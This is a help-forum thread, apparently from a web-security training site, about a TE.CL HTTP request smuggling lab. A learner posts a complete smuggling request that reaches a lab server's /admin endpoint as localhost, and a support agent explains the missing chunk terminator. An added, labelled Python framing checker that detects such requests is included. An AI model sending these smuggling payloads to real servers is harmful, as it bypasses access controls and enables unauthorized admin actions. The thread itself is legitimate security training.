Lab: Exploiting HTTP request smuggling to bypass front-end security controls, TE.CL vulnerability

Evan Oct 17, 2019 08:25PM UTC

Lab doesn't seem to be working for me, even when I follow the solution. Getting timeout errors. This is what I'm trying to use: host URL is correct, target is correct, update content length is not checkmarked, and I keep getting a timeout error after 10000ms. Having similar issues in other labs of this category.

POST / HTTP/1.1
Host: ac451f7f1e1dd31780a427f50095008e.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-length: 4
Transfer-Encoding: chunked

71
POST /admin HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: 15

x=1
0


Ben Wright Oct 18, 2019 01:35PM UTC Support Center agent

Hi,

I have just worked through this lab and was able to solve it using the instructions provided.

Have you added two carriage returns (pressing the Enter key twice) after the final 0 in the request that you have created in Burp Repeater? This is specified in the solution but some people do miss it.
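
The terminator point in the reply above, as an added example that is not part of the original thread: a defender-side framing check that flags a request carrying both Content-Length and Transfer-Encoding, and reports a chunked body that lacks the final empty line after the `0` chunk (the case where a chunked parser keeps waiting and the request times out). The function names, finding labels and the sample request (host `example.test`) are constructed for illustration.

```python
HEX = set(b"0123456789abcdefABCDEF")

def check_chunks(body: bytes) -> list[str]:
    """Walk a chunked body; report why a chunked parser would reject or stall."""
    pos = 0
    while True:
        eol = body.find(b"\r\n", pos)
        if eol < 0:
            return ["chunked-body-unterminated"]  # parser waits for more bytes
        size_field = body[pos:eol].split(b";")[0].strip()  # drop chunk extensions
        if not size_field or not set(size_field) <= HEX:
            return ["bad-chunk-size"]
        size, pos = int(size_field, 16), eol + 2
        if size == 0:
            rest = body[pos:]  # optional trailers, then the closing empty line
            done = rest.startswith(b"\r\n") or b"\r\n\r\n" in rest
            return [] if done else ["chunked-body-unterminated"]
        end = pos + size
        if len(body) < end + 2:
            return ["chunked-body-unterminated"]
        if body[end:end + 2] != b"\r\n":
            return ["chunk-size-mismatch"]
        pos = end + 2

def check_framing(raw: bytes) -> list[str]:
    """Return the framing problems a proxy or WAF should reject this request for."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        return ["incomplete-headers"]
    headers = {}
    for line in head.split(b"\r\n")[1:]:  # skip the request line
        name, _, value = line.partition(b":")
        headers.setdefault(name.strip().lower(), []).append(value.strip().lower())
    te = headers.get(b"transfer-encoding", [])
    cl = headers.get(b"content-length", [])
    findings = []
    if te and cl:
        findings.append("cl-and-te")  # two servers may frame this differently
    if len(set(cl)) > 1:
        findings.append("conflicting-content-length")
    if te and te[-1].split(b",")[-1].strip() == b"chunked":
        findings.extend(check_chunks(body))
    return findings

# Constructed sample: benign chunk payload, both framing headers present.
HEAD = (b"POST / HTTP/1.1\r\nHost: example.test\r\n"
        b"Content-Length: 4\r\nTransfer-Encoding: chunked\r\n\r\n")
TRUNCATED = HEAD + b"5\r\nhello\r\n0\r\n"  # ends right after the 0 line
COMPLETE = TRUNCATED + b"\r\n"              # 0 line followed by the empty line
```
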


Evan Oct 18, 2019 04:12PM UTC
Thank you Ben!

Turns out, I thought that admin panel access would be reflected on the admin webpage---turns out it wasn't. You just had to assume you had admin access, since no errors were returned. I went ahead and ran the code to delete Carlos and it went through!

Ben Wright Oct 21, 2019 07:23AM UTC Support Center agent

Hi Evan,

I am glad that you were able to solve your issue.

Please let us know if you need any further assistance with anything in the future.

